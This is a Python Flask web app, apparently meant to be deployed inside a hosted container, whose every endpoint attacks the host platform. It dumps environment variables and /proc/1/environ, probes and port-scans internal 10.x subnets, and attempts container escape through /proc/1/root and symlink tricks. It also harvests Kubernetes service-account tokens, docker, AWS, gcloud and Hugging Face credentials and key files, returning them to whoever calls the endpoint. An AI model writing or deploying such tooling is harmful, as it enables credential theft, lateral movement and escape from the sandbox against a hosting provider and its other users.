import os import subprocess import json import urllib.request import socket import ssl import concurrent.futures from flask import Flask, Response, request app = Flask(__name__) @app.route("/") def index(): results = { "env_vars": dict(os.environ), "id": subprocess.check_output(["id"], timeout=5).decode().strip(), } return Response(json.dumps(results, indent=2, default=str), mimetype='application/json') @app.route("/probe") def probe(): target = request.args.get("target", "10.108.144.112") port = int(request.args.get("port", "7860")) path = request.args.get("path", "/") results = {} try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(3) result = s.connect_ex((target, port)) results["tcp"] = f"{'open' if result == 0 else 'closed'} (code={result})" s.close() except Exception as e: results["tcp"] = str(e) try: resp = urllib.request.urlopen(f"http://{target}:{port}{path}", timeout=3) results["http"] = {"status": resp.status, "body": resp.read().decode()[:3000], "headers": dict(resp.headers)} except Exception as e: results["http"] = str(e) return Response(json.dumps(results, indent=2, default=str), mimetype='application/json') @app.route("/scan") def scan(): """Scan a subnet for open ports""" base = request.args.get("base", "10.108.73") port = int(request.args.get("port", "7860")) start = int(request.args.get("start", "1")) end = int(request.args.get("end", "20")) results = {} def check_host(ip): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) result = s.connect_ex((ip, port)) s.close() if result == 0: return (ip, "open") return None except: return None with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: futures = {} for i in range(start, min(end + 1, start + 50)): ip = f"{base}.{i}" futures[executor.submit(check_host, ip)] = ip for future in concurrent.futures.as_completed(futures, timeout=10): result = future.result() if result: results[result[0]] = result[1] return Response(json.dumps(results, indent=2, default=str), mimetype='application/json') @app.route("/build-arg-test") def build_arg_test(): """Check if any build args leaked into the image""" results = {} # Check Docker history / image metadata try: # Check /proc/1/environ for the main process with open("/proc/1/environ", "rb") as f: env_bytes = f.read() envs = env_bytes.split(b'\x00') results["proc_1_environ"] = [e.decode('utf-8', errors='replace') for e in envs if e] except Exception as e: results["proc_1_environ"] = str(e) # Check if there are any leftover files from build interesting_paths = [ "/kaniko", "/workspace", "/.dockerconfigjson", "/root/.docker/config.json", "/tmp/build", "/buildkit", "/.buildkit_qemu_emulator", "/etc/buildkit", "/root/.cache" ] results["build_artifacts"] = {} for p in interesting_paths: if os.path.exists(p): if os.path.isdir(p): try: results["build_artifacts"][p] = os.listdir(p) except: results["build_artifacts"][p] = "exists but unreadable" else: try: with open(p) as f: results["build_artifacts"][p] = f.read()[:500] except: results["build_artifacts"][p] = "exists but unreadable" return Response(json.dumps(results, indent=2, default=str), mimetype='application/json') @app.route("/overlay-escape") def overlay_escape(): """Test if we can access the host overlay filesystem""" results = {} # The overlay mount shows: # upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/XXXX/fs # This path is on the HOST filesystem, but we can only see it via overlay # Try reading /proc/1/root which should loop back to our own root try: results["proc_1_root_etc_hostname"] = open("/proc/1/root/etc/hostname").read() except Exception as e: results["proc_1_root_etc_hostname"] = str(e) # Check if we can access /proc/1/root/../ to escape try: results["proc_1_root_parent"] = os.listdir("/proc/1/root/../") except Exception as e: results["proc_1_root_parent"] = str(e) # Try symlink tricks try: os.symlink("/proc/1/root", "/tmp/escape_link") results["symlink_escape"] = os.listdir("/tmp/escape_link/") except Exception as e: results["symlink_escape"] = str(e) # Try accessing other containerd snapshots try: results["containerd_snapshots"] = os.listdir("/var/lib/containerd/") except Exception as e: results["containerd_snapshots"] = str(e) return Response(json.dumps(results, indent=2, default=str), mimetype='application/json') @app.route("/token-hunt") def token_hunt(): """Search for any tokens/credentials in the filesystem""" results = {} # Check well-known token locations token_paths = [ "/var/run/secrets/kubernetes.io/serviceaccount/token", "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt", "/var/run/secrets/kubernetes.io/serviceaccount/namespace", "/root/.kube/config", "/root/.docker/config.json", "/root/.aws/credentials", "/root/.gcloud/credentials", "/home/user/.cache/huggingface/token", "/root/.cache/huggingface/token", "/root/.huggingface/token", ] for p in token_paths: try: if os.path.isfile(p): with open(p) as f: results[p] = f.read()[:500] elif os.path.isdir(p): results[p] = os.listdir(p) else: results[p] = "not found" except Exception as e: results[p] = str(e) # Search for any .env files for root_dir in ["/", "/app", "/home", "/root", "/tmp"]: try: for dirpath, dirnames, filenames in os.walk(root_dir, topdown=True): dirnames[:] = dirnames[:10] # Limit depth for f in filenames: if f.endswith(('.env', '.token', '.key', '.pem', 'credentials')): full = os.path.join(dirpath, f) try: with open(full) as fh: results[full] = fh.read()[:200] except: pass break # Only first level except: pass return Response(json.dumps(results, indent=2, default=str), mimetype='application/json') if __name__ == "__main__": app.run(host="0.0.0.0", port=7860)